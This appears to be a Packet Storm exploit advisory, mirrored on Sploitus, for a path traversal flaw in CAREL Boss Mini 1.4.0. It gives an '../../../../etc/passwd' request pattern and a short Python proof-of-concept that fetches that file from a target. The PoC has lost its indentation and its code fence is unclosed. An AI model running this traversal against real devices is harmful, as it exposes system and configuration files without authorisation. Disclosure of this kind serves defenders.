## https://sploitus.com/exploit?id=PACKETSTORM:212103
=============================================================================================================================================
| # Title : Boss Mini 1.4.0 path traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.carel.com/product/boss |
=============================================================================================================================================
[+] Summary :
A vulnerability has been identified in CAREL Boss and Boss Mini
supervision devices running version 1.4.0.The weakness allows
remote unauthenticated users to disclose sensitive information
through a Local File Inclusion (LFI) vector due to improper input
validation.
Importantly, this vulnerability does NOT provide any form of RCE.
[+] References
Based on the public advisory published on Packet Storm
(https://packetstorm.news/files/id/177394/)
and the official CVE entry for **CVE-2023-3643**
combined with a fulltechnical analysis of the exploitation flow, it has been conclusively
confirmed that the widely circulated "Boss Mini 1.4.0 LFI
Log Poisoning" exploit is **fake, impossible, and non-functional**.
The device does not run PHP, does not support log-based code execution,
and the vulnerable endpoint does not allow any code interpretation.
Therefore, any exploit claiming **LFI โ Log Poisoning โ RCE** is
**technically impossible and must be considered false**.
--------------------------------------------------------------------
3. Affected Products
---------------------
- CAREL Boss Mini 1.4.0
- CAREL Boss 1.4.0
- Possibly earlier versions with similar structures
--------------------------------------------------------------------
4. Vulnerability Details
-------------------------
The vulnerable parameter **path** fails to sanitize directory traversal
patterns, allowing attackers to read arbitrary files accessible by the
web process.
Example vulnerable pattern: /boss/document?path=../../../../etc/passwd
This grants information disclosure but **cannot** escalate to RCE because
the appliance lacks PHP or any script execution engine.
--------------------------------------------------------------------
5. Impact
----------
This vulnerability allows:
- Reading system files
- Accessing sensitive configuration data
- Disclosure of internal JSON configuration structures
This vulnerability **does NOT allow**:
- Command execution
- Reverse shell
- Payload injection
- Any form of RCE
--------------------------------------------------------------------
6. (PoC)
-------------------------------
```python
#!/usr/bin/env python3
# CVE-2023-3643
# Research: Indoushka
import requests
target = "http://TARGET-IP"
payload = "../../../../etc/passwd"
url = f"{target}/boss/document?path={payload}"
r = requests.get(url, timeout=10)
if r.status_code == 200:
print("[+] Vulnerable! File contents:")
print(r.text)
else:
print("[-] Not vulnerable or patched.")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================